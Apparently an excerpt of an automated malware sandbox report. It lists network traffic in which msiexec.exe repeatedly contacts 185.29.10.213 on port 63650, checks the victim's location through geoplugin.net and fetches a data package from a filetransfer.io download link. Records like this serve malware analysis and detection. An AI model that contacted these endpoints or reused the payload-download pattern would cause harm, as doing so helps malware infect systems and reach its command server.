                                                                                          Dec 4, 2024 06:37:22.463191032 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.463246107 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.463289022 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.463339090 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.464740992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.464946032 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.465003967 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.466288090 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.466396093 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.467624903 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.467839003 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.467946053 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.469638109 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.469682932 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.469696999 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.469738960 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.470959902 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.471000910 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.471052885 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.472485065 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.472544909 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.472593069 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.474033117 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.474081993 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.475595951 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.475598097 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.475629091 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.477127075 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.477175951 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.477201939 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.477247000 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.478702068 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.478749990 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.479676008 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.480232954 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.480310917 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.481766939 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.481816053 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.481848955 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.481898069 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.483345032 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.483366013 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.483623028 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.484858990 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.484961033 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.486423969 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.486469984 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.486505032 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.486555099 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.487968922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.488120079 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.488169909 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.489526033 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.489583015 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.491077900 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.491159916 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.491190910 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.491238117 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.492628098 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.492727995 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.492779970 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.494169950 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.494230986 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.495620966 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.495740891 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.543685913 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.557974100 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.558109045 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.558182955 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.558223009 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.558243036 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.558290958 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.559173107 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.559245110 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.559530020 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.560064077 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.560175896 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.560993910 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.561037064 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.561094046 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.561136961 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.561950922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.562056065 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.562903881 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.562947035 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.563021898 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.563064098 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.563849926 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.564059973 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.564106941 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.564784050 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.564886093 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.564980984 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.565749884 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.565856934 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.565906048 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.566694021 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.566839933 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.566883087 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.567666054 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.567770958 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.567828894 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.568593979 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.568692923 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.569531918 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.569572926 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.569622040 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.569660902 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.570523024 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.570636988 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.570677042 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.571465015 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.571552992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.571599007 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.572371006 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.572479010 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.572520018 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.573313951 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.573421955 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.573538065 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.574273109 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.574395895 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.575215101 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.575268984 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.575325012 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.575371027 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.576190948 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.576237917 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.577157974 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.577250957 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.577261925 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.577306986 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.578069925 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.578202009 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.578258991 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.579029083 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.579140902 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.579961061 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.580005884 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.580079079 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.580127001 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.580931902 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.581042051 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.581120014 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.581866980 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.581999063 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.582818985 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.582860947 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.582917929 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.582963943 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.583750010 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.583867073 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.584254026 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.584717989 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.584855080 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.585637093 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.585679054 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.671386957 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.671464920 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.671530008 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.671833992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.671911955 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.672909975 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.672951937 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.673077106 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.673116922 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.673702002 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.673819065 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.673876047 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.674658060 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.674773932 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.675590992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.675641060 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.675698996 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.675735950 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.676548004 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.676670074 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.677493095 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.677536964 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.677546978 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.678461075 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.678503990 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.678646088 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.678685904 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.679408073 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.679536104 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.680389881 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.680429935 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.680608034 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.680646896 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.681273937 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.681421041 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.681530952 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.682250977 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.682368994 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.683193922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.683245897 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.683288097 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.683325052 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.684271097 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.684480906 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.685549021 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.685626030 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.685678005 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.686074018 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.686093092 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.686125040 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.686145067 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.686996937 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.687103987 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.687154055 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.687933922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.688038111 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.688869953 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.688921928 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.688961029 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.689004898 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.768291950 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.825009108 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:24.756095886 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:24.876199007 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876214027 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876405001 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876416922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876487970 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:24.876503944 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876534939 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876640081 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876652002 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876780987 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.876805067 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996485949 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996504068 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996526957 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996716976 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996728897 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.996777058 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.997103930 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:24.997179985 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:33.210922956 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:33.214416981 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:33.335980892 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:38:03.294492960 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:38:03.303924084 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:38:03.424272060 CET6365049825185.29.10.213192.168.2.5
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 4, 2024 06:37:06.698788881 CET6017353192.168.2.51.1.1.1
                                                                                          Dec 4, 2024 06:37:06.838856936 CET53601731.1.1.1192.168.2.5
                                                                                          Dec 4, 2024 06:37:09.105364084 CET5329453192.168.2.51.1.1.1
                                                                                          Dec 4, 2024 06:37:09.250102997 CET53532941.1.1.1192.168.2.5
                                                                                          Dec 4, 2024 06:37:16.610054970 CET5879653192.168.2.51.1.1.1
                                                                                          Dec 4, 2024 06:37:16.751357079 CET53587961.1.1.1192.168.2.5
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 4, 2024 06:37:06.698788881 CET192.168.2.51.1.1.10x9f11Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 06:37:09.105364084 CET192.168.2.51.1.1.10x763dStandard query (0)s25.filetransfer.ioA (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 06:37:16.610054970 CET192.168.2.51.1.1.10xd973Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 4, 2024 06:37:06.838856936 CET1.1.1.1192.168.2.50x9f11No error (0)filetransfer.io104.21.13.139A (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 06:37:06.838856936 CET1.1.1.1192.168.2.50x9f11No error (0)filetransfer.io172.67.200.96A (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 06:37:09.250102997 CET1.1.1.1192.168.2.50x763dNo error (0)s25.filetransfer.io104.21.13.139A (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 06:37:09.250102997 CET1.1.1.1192.168.2.50x763dNo error (0)s25.filetransfer.io172.67.200.96A (IP address)IN (0x0001)false
                                                                                          Dec 4, 2024 06:37:16.751357079 CET1.1.1.1192.168.2.50xd973No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                          • filetransfer.io
                                                                                          • s25.filetransfer.io
                                                                                          • geoplugin.net
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549835178.237.33.50801292C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 4, 2024 06:37:16.875885010 CET71OUTGET /json.gp HTTP/1.1
                                                                                          Host: geoplugin.net
                                                                                          Cache-Control: no-cache
                                                                                          Dec 4, 2024 06:37:18.211393118 CET1171INHTTP/1.1 200 OK
                                                                                          date: Wed, 04 Dec 2024 05:37:18 GMT
                                                                                          server: Apache
                                                                                          content-length: 963
                                                                                          content-type: application/json; charset=utf-8
                                                                                          cache-control: public, max-age=300
                                                                                          access-control-allow-origin: *
                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549807104.21.13.1394431292C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-04 05:37:08 UTC190OUTGET /data-package/a8AChfye/download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                          Host: filetransfer.io
                                                                                          Cache-Control: no-cache
                                                                                          2024-12-04 05:37:09 UTC1270INHTTP/1.1 302 Found
                                                                                          Date: Wed, 04 Dec 2024 05:37:08 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: Nette Framework 3
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                                          Set-Cookie: PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg; expires=Wed, 18-Dec-2024 05:37:08 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Vary: X-Requested-With
                                                                                          Location: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn
                                                                                          CF-Cache-Status: DYNAMIC
